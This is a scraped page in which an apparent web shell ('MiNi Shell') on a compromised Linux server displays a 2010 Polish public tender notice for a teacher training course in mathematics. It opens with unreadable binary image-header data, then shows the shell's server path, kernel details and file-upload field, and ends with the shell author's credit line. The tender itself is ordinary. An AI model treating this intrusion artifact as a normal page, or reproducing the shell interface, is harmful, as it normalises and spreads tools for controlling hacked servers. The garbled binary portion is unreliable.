JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100910/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100910/248929-N-2010.html

<p class="kh_header"><b>Toruń: Przygotowanie autorskich scenariuszy i prowadzenie zajęć podczas kursu dla nauczycieli szkół ponadgimnazjalnych Skuteczne i nowoczesne nauczanie matematyki, realizowanych w ramach Projektu pt. Klucz do uczenia - program wsparcia kujawsko-pomorskich nauczycieli.</b><br>
<b>Numer ogłoszenia: 248929 - 2010; data zamieszczenia: 10.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Kujawsko-Pomorskie Centrum Edukacji Nauczycieli , Aleja Solidarności 3, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 56 62 277 47, faks 56 62 231 81.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kpcen-torun.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przygotowanie autorskich scenariuszy i prowadzenie zajęć podczas kursu dla nauczycieli szkół ponadgimnazjalnych Skuteczne i nowoczesne nauczanie matematyki, realizowanych w ramach Projektu pt. Klucz do uczenia - program wsparcia kujawsko-pomorskich nauczycieli..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przygotowanie autorskich scenariuszy i prowadzenie zajęć  podczas jednej edycji kursu dla nauczycieli szkół ponadgimnazjalnych   Skuteczne i nowoczesne nauczanie matematyki. 
Prowadzący zajęcia ma spełniać wszystkie wymagania niezbędne i co najmniej trzy wymagania dodatkowe określone w specyfikacji
Zajęcia mają być realizowane w wymiarze godzinowym (ilość godzin zgodna zestawieniami przedstawionymi w niniejszej specyfikacji) wg ustalonego harmonogramu.
Treści zajęć muszą odpowiadać celom wyszczególnionym w specyfikacji.
Odbiór usługi zostanie udokumentowany przekazaniem Zamawiającemu scenariuszy zajęć, przekazaniem Zamawiającemu do powielenia materiałów dla uczestników kursu, zapisami w dzienniku kursu czasu i tematyki zajęć.
Zamówienie składa się z części.
Częścią jest każdy moduł.
Do wszystkich części odnoszą się poniższe uwagi:
Cele kursu 
-Zapoznanie z nowoczesnymi technologiami przydatnymi w procesie dydaktycznym,
-Pokazanie przykładów aktywnych metod nauczania matematyki,
-Obowiązkowa matura z matematyki jako ważny element w edukacji.
Przewidywane efekty szkolenia:
-prezentacja w formie plakatu na temat: Co oznacza hasło skuteczne i nowoczesne nauczanie matematyki w liceum ?
-uczestnik wie na czym polega skuteczne i nowoczesne nauczanie matematyki
-uczestnicy potrafią przygotować zajęcia w oparciu o wybrane programy komputerowe z użyciem różnych technologii
-uczestnicy znają skuteczne rozwiązania metodyczne przydatne w pracy nauczyciela
-potrafią interpretować ogólne i szczegółowe wymagania egzaminacyjne
-znają strukturę arkusza maturalnego na poziomie podstawowym i rozszerzonym
MODUŁ 1
Co oznacza hasło: Skuteczne i nowoczesne nauczanie matematyki ?
Cele szczegółowe:
-wymiana myśli i wykreowanie wzorca nowoczesnego i skutecznego nauczyciela matematyki
-omówienie oczekiwań uczniów, rodziców, szkoły
MODUŁ 2
Nowoczesne technologie - platforma moodle, programy komputerowe z matematyki, prezentacje multimedialne, kalkulator graficzny, tablice interaktywne i ich stosowanie w procesie dydaktycznym na lekcjach matematyki w liceum
Cele szczegółowe:
-zapoznanie z nowoczesnymi technologiami przydatnymi w procesie dydaktycznym 
-zapoznanie z programami matematycznymi pomocnymi przy opracowywaniu materiałów dydaktycznych
-zaznajomienie z tworzeniem scenariuszy lekcji realizowanych w oparciu o technologie informacyjne
MODUŁ 3
Warsztat pracy skutecznego nauczyciela matematyki. Przykładowe rozwiązania metodyczne. Modelowanie matematyczne.
Cele szczegółowe:
-zaznajomienie z rozwiązaniami metodycznymi mobilizującymi i zachęcającymi uczniów do pracy
-pokazanie przykładów aktywnych metod nauczania matematyki
-prezentacja przykładów modelowania matematycznego
MODUŁ 4
Konstruowanie materiałów dydaktycznych z matematyki dla licealistów. Lekcje prowadzone aktywnymi metodami przez autorów kursu oraz przez uczestników kursu. ( publikacja na platformie moodle)
Cele szczegółowe:
-budowanie otwartości w przedstawianiu swoich poglądów i stosownych rozwiązań metodycznych 
-rozwijanie otwartości w dzieleniu się wiedzą w środowisku zawodowym
MODUŁ 5
Egzaminy zewnętrzne - obowiązkowa matura z matematyki jako ważny element w edukacji ucznia szkoły ponadgimnazjalnej
Cele szczegółowe:
-umiejętność interpretacji wymagań ogólnych i szczegółowych określonych na egzaminie maturalnym z matematyki 
-zaznajomienie z budową arkusza maturalnego na obydwu poziomach: podstawowym i rozszerzonym
-wskazanie na rolę egzaminów zewnętrznych we współczesnej edukacji
Lp.	Realizowane treści 	Liczba godzin	Formy pracy np. wykład, warsztaty

1
	
Co oznacza hasło: 
Skuteczne i nowoczesne nauczanie matematyki?

	
5	
Wykład - 2
Warsztaty - 3

2
	
Nowoczesne technologie - platforma moodle, programy komputerowe z matematyki, prezentacje multimedialne, kalkulator graficzny, tablice interaktywne i ich stosowanie w procesie dydaktycznym na lekcjach matematyki w liceum.

	
9	
Wykład - 1
Warsztaty - 8


4 	Warsztat pracy skutecznego nauczyciela matematyki.
Przykładowe rozwiązania metodyczne.
Modelowanie matematyczne.

	12	Wykład - 2
Warsztaty - 3

5
	
Konstruowanie materiałów dydaktycznych z matematyki dla licealistów.
Lekcje prowadzone aktywnymi metodami przez autorów kursu oraz  przez uczestników kursu.
(publikacja na platforma moodle)



	
7	
Wykład - 3
Warsztaty - 4


6	Egzaminy zewnętrzne - obowiązkowa matura z matematyki jako ważny element w edukacji ucznia szkoły ponadgimnazjalnej.


	7	Wykład - 1
Warsztaty - 6



Wymagania  dotyczące opracowania scenariuszy zajęć:

1.	zgodność treści zajęć z celami ogólnymi programu i celami szczegółowymi modułu,
2.	dostosowanie struktury zajęć (zakres treści, ich logiczny układ, czas ich trwania) do celów programu,
3.	celowość doboru metod i form pracy,
4.	przydatność przewidywanych efektów szkolenia 
5.	zgodność treści szkolenia ze stanem aktualnej wiedzy teoretycznej i praktycznej na dany temat..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, posiadają niezbędną wiedzę i doświadczenie w zakresie odpowiadającym swoim rodzajem przedmiotowi zamówienia, tj: posiadają:
- wykształcenie wyższe matematyczne,
- ukończone studia podyplomowe lub kursy kwalifikacyjne lub posiadany tytuł naukowy
- doświadczenie w zakresie doskonalenia lub kształcenia nauczycieli matematyki,
dysponują osobami zdolnymi do wykonania zamówienia, tj. osobami, które posiadają poniższe kwalifikacje zawodowe - wykształcenie co najmniej wyższe magisterskie z przygotowaniem pedagogicznym, ukończone studia podyplomowe lub kursy kwalifikacyjne lub posiadają tytuł naukowy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dysponują osobami zdolnymi do wykonania zamówienia tj.;posiadają niezbędną wiedzę i doświadczenie w zakresie odpowiadającym swoim rodzajem przedmiotowi zamówienia, posiadają:
wykształcenie wyższe matematyczne,ukończone studia podyplomowe lub kursy kwalifikacyjne lub posiadany tytuł naukowy, doświadczenie w zakresie doskonalenia lub kształcenia nauczycieli matematyki,
dysponują osobami zdolnymi do wykonania zamówienia, tj. osobami, które posiadają poniższe kwalifikacje zawodowe - warunki obowiązkowe: 
wykształcenie co najmniej wyższe magisterskie z przygotowaniem pedagogicznym, ukończone studia podyplomowe lub kursy kwalifikacyjne lub posiadają tytuł naukowy 

oraz wykażą spełnienie przynajmniej trzech z poniższych warunków opcjonalnych:
-ukończone kursy i warsztaty doskonalące zgodne z tematyką kursu
-opracowanie autorskich programów, materiałów dla nauczycieli oraz scenariuszy szkoleń dla nauczycieli
-doświadczenie na stanowisku doradcy metodycznego lub konsultanta lub dyrektora szkoły ponadgimnazjalnej lub wicedyrektora szkoły ponadgimnazjalnej
-udział w komisji sprawdzającej prace próbnej matury z matematyki
-egzaminator egzaminu maturalnego z matematyki
dysponują odpowiednim potencjałem technicznym,
znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 30</li>
<li>2 - Przedstawiony scenariusz zajęć - 35</li>
<li>3 - Spełnianie kryteriów dodatkowych - 35</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>4.	Poza przypadkami określonymi w umowie zmiany umowy będą mogły nastąpić w wymienionych niżej okolicznościach:
a)	Zaistnienia, po zawarciu umowy, przypadku siły wyższej, przez którą na potrzeby niniejszego warunku, rozumieć należy zdarzenie zewnętrzne wobec łączącej strony więzi prawnej:
- o charakterze niezależnym od stron,
- którego strony nie mogły przewidzieć przed zawarciem umowy,
- którego nie można uniknąć ani któremu strony nie mogły zapobiec przy zachowaniu należytej staranności, której nie można przypisać drugiej stronie.
Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności: powódź, pożar, inne klęski żywiołowe, nagłe załamania warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej.
b)	Zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia stron,
c)	Powstania rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie będzie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony,
d)	Zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych sytuacją finansową, zdolnościami płatniczymi lub warunkami organizacyjnymi bądź okolicznościami, które nie były możliwe do przewidzenia w momencie zawarcia umowy - zmianie mogą ulec termin realizacji umowy bądź terminy wynikające z harmonogramów płatności,
e)	Gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy, zgodnie ze specyfikacja istotnych warunków zamówienia - Zamawiający dopuszcza możliwość zmiany umowy, w szczególności w zakresie zmiany przedmiotu zamówienia,  terminu realizacji, a także innych wymienionych w umowie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kpcen-torun.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kujawsko-Pomorskie Centrum Edukacji Nauczycieli, Al. Solidarności 3, 87-100 Toruń.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.09.2010 godzina 15:00, miejsce: Kujawsko-Pomorskie Centrum Edukacji Nauczycieli, Al. Solidarności 3, 87-100 Toruń.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków UE, w ramach programu POKL, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.4 Wysoko wykwalifikowane kadry systemu oświaty, Tytuł projektu Klucz do uczenia - program wsparcia kujawsko-pomorskich nauczycieli..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Co oznacza hasło: Skuteczne i nowoczesne nauczanie matematyki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cele szczegółowe:
-wymiana myśli i wykreowanie wzorca nowoczesnego i skutecznego nauczyciela matematyki
-omówienie oczekiwań uczniów, rodziców, szkoły.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 30</li>
<li>2. Przedstawiony scenariusz zajęć - 35</li>
<li>3. Spełnianie kryteriów dodatkowych - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Nowoczesne technologie - platforma moodle, programy komputerowe z matematyki, prezentacje multimedialne, kalkulator graficzny, tablice interaktywne i ich stosowanie w procesie dydaktycznym na lekcjach matematyki w liceum.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cele szczegółowe:
-zapoznanie z nowoczesnymi technologiami przydatnymi w procesie dydaktycznym 
-zapoznanie z programami matematycznymi pomocnymi przy opracowywaniu materiałów dydaktycznych
-zaznajomienie z tworzeniem scenariuszy lekcji realizowanych w oparciu o technologie informacyjne.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 30</li>
<li>2. Przedstawiony scenariusz zajęć - 35</li>
<li>3. Spełnianie kryteriów dodatkowych - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Warsztat pracy skutecznego nauczyciela matematyki. Przykładowe rozwiązania metodyczne. Modelowanie matematyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cele szczegółowe:
-zaznajomienie z rozwiązaniami metodycznymi mobilizującymi i zachęcającymi uczniów do pracy
-pokazanie przykładów aktywnych metod nauczania matematyki
-prezentacja przykładów modelowania matematycznego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 30</li>
<li>2. Przedstawiony scenariusz zajęć - 35</li>
<li>3. Spełnianie kryteriów dodatkowych - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Konstruowanie materiałów dydaktycznych z matematyki dla licealistów. Lekcje prowadzone aktywnymi metodami przez autorów kursu oraz przez uczestników kursu. ( publikacja na platformie moodle).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cele szczegółowe:
-budowanie otwartości w przedstawianiu swoich poglądów i stosownych rozwiązań metodycznych 
-rozwijanie otwartości w dzieleniu się wiedzą w środowisku zawodowym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 30</li>
<li>2. Przedstawiony scenariusz zajęć - 35</li>
<li>3. Spełnianie kryteriów dodatkowych - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Egzaminy zewnętrzne - obowiązkowa matura z matematyki jako ważny element w edukacji ucznia szkoły ponadgimnazjalnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cele szczegółowe:
-umiejętność interpretacji wymagań ogólnych i szczegółowych określonych na egzaminie maturalnym z matematyki 
-zaznajomienie z budową arkusza maturalnego na obydwu poziomach: podstawowym i rozszerzonym
-wskazanie na rolę egzaminów zewnętrznych we współczesnej edukacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 30</li>
<li>2. Przedstawiony scenariusz zajęć - 35</li>
<li>3. Spełnianie kryteriów dodatkowych - 35</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com